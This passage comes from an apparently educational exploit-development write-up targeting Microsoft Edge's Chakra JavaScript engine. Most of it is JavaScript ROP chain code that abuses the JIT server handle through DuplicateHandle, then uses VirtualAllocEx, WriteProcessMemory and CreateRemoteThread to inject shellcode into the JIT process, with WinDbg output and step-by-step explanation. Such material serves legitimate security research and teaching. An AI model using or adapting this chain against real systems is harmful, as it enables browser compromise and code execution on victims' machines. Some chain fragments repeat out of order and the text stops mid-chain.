write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

Let’s now walk through this in the debugger. We again set a breakpoint on jmp rax until we reach our call to CreateRemoteThread. From here we can pt this function call to pause at the ret, and view our first gadgets for our new WriteProcessMemory ROP chain.

If we look at the above WriteProcessMemory ROP chain, we start off by actually preserving the value of the handle to the thread we just created in the .data section of kernelbase.dll (very similarly to what we did with preserving our VirtualAllocEx allocation). We can see this in action below (remember CreateRemoteThread’s return value is the handle value to the new thread. It is stored in RAX, so we can pull it directly from there):

After preserving the address, we begin with our first parameter - nSize. Since we are just writing a pointer value, we specify 8 bytes (while dealing with the pesky cmp r8d, [rax] instruction):

Our function call is now in the following state:

	0x8							// 64-bit pointer size (sizeof(QWORD)))

The next parameter we will target is hProcess. This time we are not writing remotely, and we can simply use -1, or 0xFFFFFFFFFFFFFFFF. This is the value returned by GetCurrentProcess to retrieve a handle to the current process. This tells WriteProcessMemory to perform this write process within the content process, where our VirtualProtect ROP chain is and where our exploit is currently executing. We can simply just write this value to the stack and pop it into RCX.

Our call is now in the current state:

	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Pseudo handle to the current process (the content process, when the exploit is executing)
	0x8							// 64-bit pointer size (sizeof(QWORD)))

Next up is lpBaseAddress parameter. This is where we want WriteProcessMemory to write whatever data we want to. In this case, this is the location in the VirtualProtect ROP chain in the .data section of chakra.dll.

Our call is now in the current state:

	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Pseudo handle to the current process (the content process, when the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address of our return value from VirtualAllocEx (where we want to write the VirtualAllocEx_allocation address to)
	0x8							// 64-bit pointer size (sizeof(QWORD)))

The next item to take care of is the lpBuffer. This memory address contains the contents we want to write to lpBaseAddress. Recall earlier that we stored our VirtualAllocEx allocation (our shellcode location in the remote process) into the .data section of kernelbase.dll. Since lpBuffer requires a pointer, we simply just need to place the .data address of our stored allocation into R8.

Our call is now in the following state:

	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Pseudo handle to the current process (the content process, when the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address of our return value from VirtualAllocEx (where we want to write the VirtualAllocEx_allocation address to)
	addressof(VirtualAllocEx_Allocation),			// Address of our VirtualAllocEx allocation (where our shellcode resides in the JIT process at this point in the exploit)
	0x8							// 64-bit pointer size (sizeof(QWORD)))

The last parameter we need to write to the stack, so we will go ahead and load WriteProcessMemory into RAX and directly write our NULL value.

Here is our VirtualProtect ROP chain before (we are trying to update it an exploit runtime):

After (using pt to execute the call to WriteProcessMemory, which pauses execution on the ret):

As we can see, we successfully updated our ROP chain so that when the VirtualProtect ROP chain is eventually called, it is aware of where our shellcode is.

WriteProcessMemory ROP Chain (Round 3)

This ROP chain is identical to the above ROP chain, except for the fact we want to overwrite a placeholder for the β€œfake return address” after our eventual call to VirtualProtect. We want VirtualProtect, after it is called, to transfer execution to our shellcode. This can be seen in a snippet of our VirtualProtect ROP chain.

// Store the current offset within the .data section into a var
ropoffsetTwo = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)

We need to reconcile this, just like we did in our last WriteProcessMemory call, where we dynamically updated the ROP chain. Again, we need to use another call to WriteProcessMemory to update this last location. This will ensure our eventual VirtualProtect ROP chain is good to go. We will omit these steps, as it is all documented above, but I will still provide the updated code below.

// alert() for debugging

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
